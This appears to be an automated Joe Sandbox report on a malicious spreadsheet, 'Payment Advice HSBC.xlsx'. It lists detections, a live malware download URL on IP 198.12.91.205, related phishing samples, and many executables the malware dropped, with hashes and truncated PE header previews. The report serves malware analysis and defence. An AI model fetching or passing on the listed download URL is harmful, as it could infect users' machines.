C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.0.vbc.exe.400000.11.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.5.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.9.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.17.unpack	100%	Avira	W32/Delf.I	Download File
5.2.vbc.exe.400000.1.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.19.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.13.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.7.unpack	100%	Avira	W32/Delf.I	Download File
5.0.vbc.exe.400000.15.unpack	100%	Avira	W32/Delf.I	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://198.12.91.205/50005/vbc.exe	5%	Virustotal		Browse
http://198.12.91.205/50005/vbc.exe	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://198.12.91.205/50005/vbc.exe	true	5%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://www.windows.com/pctv.	vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	false	high
http://investor.msn.com	vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	false	high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	false	high
http://www.hotmail.com/oe	vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	false	high
http://investor.msn.com/	vbc.exe, 00000005.00000002.631211132.00000000027B0000.00000002.00020000.sdmp	false	high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.12.91.205	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	528781
Start date:	25.11.2021
Start time:	19:04:13
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Payment Advice HSBC.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winXLSX@7/103@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 88.3% (good quality ratio 87.5%) Quality average: 85% Quality standard deviation: 23.6%
HCA Information:	Successful, ratio: 59% Number of executed functions: 53 Number of non-executed functions: 15
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryDirectoryFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:04:41	API Interceptor	69x Sleep call for process: EQNEDT32.EXE modified
19:04:44	API Interceptor	461x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.12.91.205	Shipping Schedule.xlsx	Get hash	malicious	Browse	198.12.91.205/40004/vbc.exe

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	REMITTANCE ADVICE.xlsx	Get hash	malicious	Browse	192.210.173.90
	3nkW4MtwSD.rtf	Get hash	malicious	Browse	198.46.199.153
	Employee payment plan.HTM	Get hash	malicious	Browse	23.95.214.111
	ATT67586.HTM	Get hash	malicious	Browse	172.245.112.92
	xF3wienie.xlsx	Get hash	malicious	Browse	198.23.207.111
	Quote Request - Linde Tunisia.xlsx	Get hash	malicious	Browse	107.173.191.111
	PO PENANG ORDER C0023.xlsx	Get hash	malicious	Browse	198.12.107.117
	BANK-SWIFT.xlsx	Get hash	malicious	Browse	107.173.229.133
	1HT42224.xlsx	Get hash	malicious	Browse	198.23.207.36
	new order.xlsx	Get hash	malicious	Browse	198.23.251.13
	Shipping Schedule.xlsx	Get hash	malicious	Browse	198.12.91.205
	Product_Specification_Sheet.xlsx	Get hash	malicious	Browse	107.173.219.26
	lod2.xlsx	Get hash	malicious	Browse	198.23.207.36
	Payment Slip.xlsx	Get hash	malicious	Browse	198.46.136.245
	20002.xlsx	Get hash	malicious	Browse	198.46.136.245
	lSBl5Mhq80.rtf	Get hash	malicious	Browse	198.46.199.153
	STATEMENT OF ACCOUNT.xlsx	Get hash	malicious	Browse	192.227.228.37
	new order.docx	Get hash	malicious	Browse	198.46.199.153
	Amended Order.xlsx	Get hash	malicious	Browse	192.3.121.173
	Payment Swift.xlsx	Get hash	malicious	Browse	198.12.107.104

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	215912
Entropy (8bit):	6.147499380006249
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bC4kXbVjF/ZNGtFdNdFnTDYZNjPFEHI:xBzcmhi3rNF/ZNGtF+yI
MD5:	FE4E27343980ED24E9BD0672C00119EE
SHA1:	8504A6A7B510060F6FC220F2647B07B0E8B9CCEC
SHA-256:	FF28ABABB231CC1DEC59DCFDD253A20693DD7E103A171BB86F131FA38DBA27DA
SHA-512:	E196283229ECB0F10C9134C9A1BBB2D415557C1A563FF2B72429DBDF2595DA9CBA5176843CA9817E070531BE25A4999E357A5651B91585B2F546DF97B794423A
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1419128
Entropy (8bit):	6.387379878027633
Encrypted:	false
SSDEEP:	24576:xBomhi40Dfh6HHfKnE+RUi/LHgZJJkbipjZSMF:xBom8rfW+RUi/LHkJkOZd
MD5:	33D18B3C4408101E541B82580CCD5121
SHA1:	458DC5C058A5D5FB816BF7B731DD539E2615B493
SHA-256:	F9D7E3F9F64276BEFC4963065F99FE7E8021D831987A150006C8A1A3F5BB236D
SHA-512:	6EE747F409622EBDD145E902C50CB40CEFB52C619DC182E9131B0CDDA85940E88E7CEF8999956E0F95C1E010A99FF6B2066B71F3522C0B1F284FD76D25E75E33
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	880008
Entropy (8bit):	7.042869883266193
Encrypted:	false
SSDEEP:	24576:xBomhi+Fq1lx7SqE0xJ2pm8FiWCm3LHgZpJEHp37d:xBom8+Fq171dxJ6mAQm3LHkJEJLd
MD5:	45C936A00C27B87B97404245386A0D64
SHA1:	B0D5276D85634408688780E840B100C581FA0619
SHA-256:	11F11581BE6C740FB17878DC29AAC2A0F72ACF5B8B0CBAFD1C04D21038E7A4EA
SHA-512:	E2D031BB8167A77C889C17E5E2D9754FAAB09D8E6D1B2DC0A21B3837A2498551472FBC4B188E6B99805A5F400A6D85E605CB189C839A791919DD0B1144A10CF6
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	561056
Entropy (8bit):	7.12711332558251
Encrypted:	false
SSDEEP:	12288:xBzcmhiqwXwNSO5X3IA1iBihI7XHgZQKhJgeCmvz016:xBomhiqew0O1IA1UiuLHgZpJEGgg
MD5:	CA66D7FF44A40DC7857F500ECFFBF69A
SHA1:	CFEAE7BC45A5811652EEE5DE025D9D08936BF34B
SHA-256:	DA9C4DD8831BA18FDFCEF8D73C7694021C97EF0F496C9DEA8B68E2488592D4F1
SHA-512:	A2E20DF69DD56FD802198B9B23289BC8E4A8178B963538CA68BD4EFE152A7433AD9834368B47DFEAE5057E63D79046593561D49BE20712E799C4E353606A678C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	180208
Entropy (8bit):	6.178164538737399
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4/Hb5CZCq5DACsVlNl7HIJ1PcJ7LxnkdA53Pa4sjSTX4:xBRBcmh7bC44N5QVrZZ7Lxkmsjj
MD5:	C198DEA0634799735759F62C40A949E8
SHA1:	14259C90EC76C6E0FBD8323748ED44AF3A57B908
SHA-256:	E8AA4DC902BDDED46BAD97DC37E941C15B7EDA0A0817A626E6038EF46D65BD0A
SHA-512:	B7EA36DC257101FBEE263B344BFA5673CDAEA75B8A430C31A1D7E01E19B67CE233478A42609A05400DD960365048132A21B60DCE30EA6D397FF2A39386411B4E
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	336368
Entropy (8bit):	6.546161960304171
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCa6edjvw6L6jAVnhH1Am2ZBU4M528hW8Bi7Q5VYN9:xBzcmhia6exwI1oB8RZ4Q5VYH
MD5:	F8DC2C7BB51860CDC00E2C9AEE7CEF24
SHA1:	8E913C911F7AD23138F0366EC554360AF1C83E43
SHA-256:	AF3C565FF09FF6F332CCC4D365C42A623FDB75E06F7C033B52C011473143E2CB
SHA-512:	44D780733CFECE37F900065CA0DB53E9F76D52AA4E0C09B5B1FD4D8AB9E4C01A538AC4CBFF6B8CA281308D8E61D50A009852697549605B04F3D1FA5E4D4EE6BF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	9847280
Entropy (8bit):	6.915818001012257
Encrypted:	false
SSDEEP:	98304:whbrbT5JhEP+Su80qyLfPeLDo/uLGM7gbl91hxkPZ3m:wh/tnfW/JLGMcblLhe3m
MD5:	877EE1EF64607BE912511285C9DE02B1
SHA1:	E90A696890CC6AE58C8A6750FCE1B943B6106901
SHA-256:	B44663E906787D15EAF64F9450B9C117CD7B625ECC833E930243C6307A358468
SHA-512:	3F98F1AE49D96AE0D38B18B3AB3D0E9B80C645D6CFA0C86E77981728FB37C674AB77F84CB1130AC782C79E83BB357810D2F0C7312FD982E45E79F617C49E1240
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	2567152
Entropy (8bit):	6.104373220937044
Encrypted:	false
SSDEEP:	49152:xBom895AEcdj/MDDBAq1gw3y0GbhygZ4O8b8ITDnlqFWHp:wh95ABgf2qT3xd
MD5:	3528BCA696F8765DC4355605457DFA1A
SHA1:	7C8B277F609DB24B8DE57290F6A23F3B3A00C492
SHA-256:	90D172B4F318E6C8CF06F59C1F78F641059A7BF7A06A8AF3D180EA57EEC11006
SHA-512:	20F81D29D7CA5113FD0B546C434B0414F1E9BC632F1CD99F3C1E8F22F128609DBA98898DC0918094D92E809A15049A67611D14BEC266A26F3114A547285B34B4
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	89072
Entropy (8bit):	5.942708798657772
Encrypted:	false
SSDEEP:	1536:xBR2ucOhDh7uIhzVCbd56fCxU6QeSnQma42IghRE/EkHd0Ci2zkQrScklq6L2a:xBRBcmh7b1I4qEM6GC+QrGlqla
MD5:	664FF5E60A093668E5A0087FED88AE9E
SHA1:	DCB2666E8D8B4FFE67DA3C3A2DB8EEDE5989CE4C
SHA-256:	3DB699D55B87999E5BFB3A14CD8A0997E8F8E4A189BCD7F752DFE173E6E9D176
SHA-512:	5349A1BE59E162C20F9535C99BF3399969F171709DD7FF925B8052BF132136432E7EFD9DC487A5C51B8A6D5A133F046AA01187E763B843BE02E53B90C3D385EF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5975024
Entropy (8bit):	6.607115630568678
Encrypted:	false
SSDEEP:	98304:whuwn75ZycAIHTHsxrKxnYrs4BAxxQEWA:whn7w0Hc5wFB
MD5:	6A8B5FA6A0E552D6EB69CA96C5ACA295
SHA1:	4112C695328B57C5184ACE0F2573B7C3499DF1FA
SHA-256:	55D28C71E60D1F33A7CA198BA9781D293F2D6ADE320CA19D16BB4F9FA86D247E
SHA-512:	1CEFBC9DFF542D7859F6AEE8B3A2348FF2253084810F856F05529D00FB14DB1EBF57BCB077322D48C39621F1D369CC451B78BCCC650E315231E1933DF5721DBF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	188400
Entropy (8bit):	6.481638648358743
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4Q8eIsfHwCbf9MFdRvyAgnz8n/dfQ7PjFKq23T/h:xBRBcmh7bCHbfHwCbyFdAafCPc53T/h
MD5:	FFFFE3A97457DD5F560ECD4826A71D8A
SHA1:	51F681F9E4F29D520B4C1345AB4E41D9952DCCE9
SHA-256:	9C4448B66393EB1F625CDE58E102DEFAFFF47DA9D2D8BCF81DBD1FD845FDB6DA
SHA-512:	FC7BCD2D5F02EFD063753152AFF9AFD8495EF2CDB20FF0BCA8F09046E6DD04C36880D55ABBD565E59B8D1C70627F4BDB4F1A1038897D8A8B413EC90C3ED1F2BE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	135152
Entropy (8bit):	6.103497064299536
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4aq9YnyoRmLisiselSsONt3F7oQGO7M1bp:xBRBcmh7bCbgLHvld2
MD5:	D56792EAAA9B21B4A472CFE9F86CE65A
SHA1:	DC35051E8E88EB872AC2F9720D5E288CEDAE21AE
SHA-256:	4708861481D547DF6BBD6A2951ACEDF7ABACBE4A86F66072919F27A3A88A33BA
SHA-512:	18C68CDA0FA65F93785DF85ABFA07D201C7981269EBC8A58C282B8A4435D90E8D52E64B9C8719B0B810D40D3C58EA4262A397BB5D98CFC1A698EB480726CCACD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	260104
Entropy (8bit):	6.3134488042906804
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4gl4dsOc6v2vTzwU+Pho86meq+FaSoB2+vSHr8qcVz5fzsC:xBRBcmh7bCW3PiY+Fa7BdvG1cT7
MD5:	D3F7A3A8D78644F464228B1DF70A6079
SHA1:	6F51EC06B7F74660FC7263248AAAA1186B8A7C67
SHA-256:	39753D8F2976637B3C46EFF59BD5F31B58AF27AED0B4026F10A16A66CF36C8EF
SHA-512:	930C528F7374711A89666EB568E15764BDB63E0DE2351DCF2D9F97C85DE0E28320A7332AEF25903288A9D43AD9004B658552C1B53766CD7EB5DB0A29AA5E5F33
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	395344
Entropy (8bit):	6.367971900375879
Encrypted:	false
SSDEEP:	6144:xBRBcmh7bCV3n0dK2NP0RHx8D98WTBPW8fF8oABm1nKZ0RsrI:xBzcmhiEKhHSDeWTRW8fdebmqI
MD5:	875FD9856B097F5DAC8B884B029385EA
SHA1:	8E4B825CE8C97E11AC8721375BFD3A1D3F1D54FC
SHA-256:	FC7B5A5459697AC21E7255F89048279A75361DB39AC22D6682CF90A402B70B3B
SHA-512:	3902A912A96917542F93A72BB1DCB8072097FC70A6873CCA7500B30AF69D31FB367C3B5B7DA701675E64D05FCB0B7B8F69CFCE923089964A357137ECD7369396
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe Download File
Process:	C:\Users\Public\vbc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	128160
Entropy (8bit):	6.123567196991157
Encrypted:	false
SSDEEP:	3072:xBRBcmh7b1I4KQw/STyr5Jks7MvrMzkm8PL3Eo:xBRBcmh7bC/QPQLrzkmIL3Eo
MD5:	E703BDEC9684281461E1111528804D8D
SHA1:	F295E753C9556C13D9D0CE17886301B660D2F631
SHA-256:	315B5617BF7C3E8E95FA2CFB2F5CFE418D251F3C455149518F59E0E9B93C742E
SHA-512:	55D19B2E6E735123459630C6586E35EE83985B2DA813AFE1265ECFDA662712AE67AC5FD35D8802DDD5F5774D581E6C0FCE4F6EE66FF82598D70349F13D477825
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..f..........r.... ........@.. ....................................@................................. ...O.......p............................................................................ ............... ..H............text....e... ...f.................. ..`.rsrc...p............h..............@..@.reloc...............p..............@..B................T.......H........H..T!...........j.. .............................................s....}.....s ...}.....(!....(.....{.....o"....0...........(......}.....-...}....+T.{.....o#...o$...,...{.....o#...o%...}....+(.s&...}.....{.....o#....{....o'....(.....{....,6.{....o(....+...()......(......(...-...........o.......................{....o+....{....o,...o-.....}.....0..)........{.........(....t......\|......(...+...3.....0..)........{.........(0...t......\|......(...+...3.....0..........

